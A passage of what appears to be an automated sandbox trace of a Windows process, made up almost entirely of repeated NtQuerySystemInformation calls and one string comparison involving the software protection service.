ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0239.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.704] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0239.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.721] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.724] NtQuerySystemInformation (SystemInformationClass=0xb9, 